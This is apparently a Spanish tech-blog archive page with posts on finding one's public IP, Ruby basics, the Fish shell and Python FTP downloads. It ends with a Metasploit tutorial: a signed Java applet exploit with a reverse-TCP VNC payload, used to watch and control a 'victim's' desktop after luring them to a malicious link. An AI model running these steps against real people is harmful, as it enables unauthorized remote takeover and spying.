Archives for 

ip

Como saber la IP publica con la que sales a Internet desde consola en GNU/Linux

CUando desarrollamos scripts en bash, hay ocasiones en las cuales es necesario conocer la direccion IP publica con la que sale el dispositivo hacia internet.

Existen muchas formas para descubrir ese dato, a continuacion te muuestro algunas de las tantas formas existentes para conocer tu direccion IP publica desde un script en bash:

Usando wget:

wget -qO- icanhazip.com
wget -qO- ifconfig.me/ip
Usando Curl:
curl ifconfig.me
curl icanhazip.com

Aun hay muchas mas formas de conseguir la direccion IP publica, estas son las mas sencillas que con un simple comando te arrojaran el dato   ya sea para trabajar con el directamente, o guardarlo en algun archivo, dependiendo de lo que se requiera. ¿Y tu, que comando usas para conocer tu direccion IP publica desde BASH?

Aprendiendo Ruby desde cero Capitulo I

Desde hace días quería escribir este articulo pero por falta de tiempo (cosas del trabajo) no lo había podido hacer. Aclaro que no se trata de una guía oficial ni nada por el estilo solo es compartir lo poco que he ido aprendiendo sobre este lenguaje y quizás juntos podamos aprender muchísimo mas. Bueno sin mas cháchara aquí vamos.

 

Primero una definición de la wikipedia de que es Ruby?

 

“Ruby es un lenguaje de programación interpretado, reflexivo y orientado a objetos, creado por el programador japonés Yukihiro “Matz” Matsumoto, quien comenzó a trabajar en Ruby en 1993, y lo presentó públicamente en 1995. Combina una sintaxis inspirada en Python, Perl con características de programación orientada a objetos similares a Smalltalk. Comparte también funcionalidad con otros lenguajes de programación como Lisp, Lua, Dylan y CLU. Ruby es un lenguaje de programación interpretado en una sola pasada y su implementación oficial es distribuida bajo una licencia de software libre.”

 

Algunas características importantes

 

- orientado a objetos.
- Todo es un objeto.
- Bloques.
- cuatro niveles de ámbito de variable: global, clase, instancia y local.
- manejo de excepciones.
- Mark and Sweep Garbage collector.
- expresiones regulares nativas.
- Mucho soporte para comunicación con C, con un agradable API para utilizar Ruby desde C.
- Manejo de multitareas (Threads) independiente del sistema operativo, puedes incluso usar threads en DOS!
- Gran Portabilidad, corre en toda clase de sistemas Linux/Unix, Windows, OS/2, dos, etc…

Para instalar Ruby solo ejecutamos en la terminal y como root

 

# apt-get install ruby

Después de tenerlo instalado solo bastara con teclear en la consola:

 

$irb

Y tendremos algo como esto:

 

 

Ahora realicemos algunos ejemplos, como el famoso programa “Hola Mundo!!!”

 

 

Fácil, no? muy parecido a otros lenguajes, cierto?

 

Bueno creo que es todo por el momento, la idea es que fuera el abre bocas, para la próxima empezaremos con cosas creo que un poquito mas interesantes XD.

 

Fuente 1
fuente 2

Fish: Una Shell interactiva bastante util y amigable

Esta semana,  en la universidad se puso la tarea de investigar acerca de las diferentes shell que existian, en mi caso ya conocia algunas e incluso hace algun tiempo, escribi un articulo sobre que era una shell y algunas de ellas. Sin embargo debatiando con algunos amigos Linuxeros, sobre cual era la mejor shell, llegamos a una shell no tan conocida llamada Fish.  Segun la pagina oficial FISH es:

Fish es un  intérprete de comandos interactivo. Fish destina al usuario una  shell de línea de comandos amigable sobre todo para uso interactivo.

Fish tiene algunas caracteristicas importantes como:

  • Los parametros de colores vienen activados por defecto.
  • Resaltado de sintaxis
  • Permite de manera rapida buscar comandos en el history
  • Autocompletado interactivo, incluso con la descripcion de cada parametro
  • Pagina de ayuda, interactiva y amistosa
  • Permite abrir un archivo con   la apliacion que el escritorio tenga por defecto.
  • Creacion de funciones.
  • Y mucho mas

La instalacion es muy sencilla:

apt-get install fish

Ahora lo que debemos hacer es editar el archivo /etc/passwd y alli ubicamos al usuario que deseemos que use la shell fish  y donde diga /bin/bash/ borramos y ponemos /usr/bin/fish

visitante:x:1002:1003:visitante,,,:/home/visitante:/usr/bin/fish

Ahora veamos algunas imagenes de como funciona

Para abrir cualquier documento o archivo desde la consola, podemos hacerlo de esta forma:

open imagen.jpg

Asi  la imagen se abrira con la aplicacion que el escritorio tenga por defecto para abrir este tipo de arhivos.

En conclusion, podemos decir que esta shell es perfecta para todos aquellos que desean una mayor interaccion entre la shell y el usuario.  Una shell muy interesante  y lo mejor de todo es que totalmente compatible con bash, es decir,  si sabes manejar bash, te podras defender a la perfeccion en fish. Espero la prueben y me comenten sus opiniones

Como descargar un archivo desde un servidor FTP usando python

Siguiendo con las entradas relacionadas con el gran lenguaje programacion llamado PYTHON , hoy quiero mostrar como con un sencillo y corto codigo de PYTHON podemos  descargar un archivo desde cualquier servidor FTP al cual tengamos acceso.  A continuacion un ejemplo.

#!/usr/bin/python
from ftplib import FTP
ftp = FTP(‘ip_servidor”);
ftp.login(user=’usuario, passwd=’password’)
ftp.cwd(“carpeta_donde_esta_el_archivo”);
ftp.retrbinary(‘RETR archivo.txt’,open(‘archiv.txt’,’wb’).write)
ftp.quit()

Como pueden ver es bastante sencillo, peor muy util cuando necesitamos descargar algun tipo de archivo o informacion, en el momento en que trabajamos con Python

Como inyectar un servidor VNC en una maquina remota usando el metasploit

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

  • Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
  • JAVA -> Es necesario que la victima tenga instalado JAVA instalado
  • Que la victima acepte el certificado.
  • Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

    msfupdate

El siguiente paso es correr la consola del metasploit:

    msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

    use exploit/multi/browser/java_signed_applet
    set payload windows/vncinject/reverse_tcp
    set lhost 192.168.100.1 -> Ip local
    lhost => 192.168.1.100
    exploit

A continuacion debe salir algo como esto:

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.